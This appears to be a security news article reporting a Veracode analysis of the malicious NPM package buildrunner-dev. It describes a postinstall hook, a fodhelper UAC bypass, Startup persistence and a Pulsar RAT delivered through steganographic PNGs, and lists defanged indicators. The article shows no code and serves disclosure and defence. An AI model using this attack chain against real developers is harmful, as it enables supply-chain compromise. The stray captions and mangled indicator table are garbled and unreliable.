Hackers Leverage Steganographic Images to Bypass Anti-Malware Scans and Deploy Malware Payloads

It has been discovered that a malicious NPM package called buildrunner-dev uses steganography to evade antivirus software and install a Remote Access Trojan on Windows systems by concealing.NET malware inside innocent-looking PNG images. This campaign, which was found in February 2026, represents a significant change in supply chain attack techniques since the malicious code is entirely hidden inside what looks to be a typical image file. The legitimate buildrunner and build-runner NPM packages, both of which had long since been abandoned by their maintainers, were copied into the package.

This malicious version could be mistaken for an updated release or maintained fork by a developer looking for the original package.

A file named init.js was automatically triggered by the postinstall hook after it was installed using npm install. This file silently downloaded a batch file called packageloader.bat from a Codeberg repository. In order to ensure that it would launch automatically on each subsequent login, the file then copied itself into the Windows Startup folder.

Only after removing seven layers of obfuscation from the batch file—which was 1,653 lines long but contained only about 21 lines of actual working instructions—were Veracode analysts able to uncover the entire attack chain. The rest was artificial noise: sporadic word comments, fictitious base64 strings, and junk variables created purely to trick human reviewers and static analysis tools.

Using the fodhelper.exe UAC bypass technique (MITRE ATT&CK T1548.002), the malware silently elevated itself without any visible prompt before triggering its payload. package.json (Veracode is the source) After that, it used conhost.exe to start a hidden PowerShell session, checked the system for installed antivirus software, and, depending on the outcome, followed a different infection path. The last payload was the well-known open-source Remote Access Trojan Pulsar, which was loaded via process hollowing into a genuine Windows process.

Hiding in Simple Pixels The hidden malware was present in two PNG files hosted on ImgBB: "6b8owksyv28w.png" (41×41 px, 2.3 KB) contained a 4,903-byte AMSI bypass PowerShell script, and "0zt4quciwxs2.png" (141×141 px, 67 KB) contained a compressed 136 KB.NET loader.

The hidden malware was present in two PNG files hosted on ImgBB (Source: Veracode). These payloads appear to any scanner as random visual noise because the malware encoded them directly into each image's RGB pixel values. The final encrypted Pulsar RAT payload was delivered on demand via a third steganographic PNG located at hxxps://i.ibb[.

]co/tpyTL2Zg/s9rugowxbq8i.png, which served as the live C2 channel. Indicator Type Buildrunner-dev C2 Steganographic Malicious NPM Package URL of the image: hxxps://i.ibb[. ]co/tpyTL2Zg/s9rugowxbq8i.png dropped the packageloader for batch files.bat Persistence File %AppData%\protect.bat Dropped Executable JJYDJO.exe Security teams should disable automatic postinstall script execution, audit NPM packages prior to installation, and keep a close eye out for odd PowerShell behavior. Similar attacks can be discovered before significant harm is done by keeping an eye out for UAC bypass registry modifications and unexpected outbound connections to free image hosting services.

Set ZeroOwl as a Preferred Source in Google to Receive More Instant Updates from LinkedIn and X.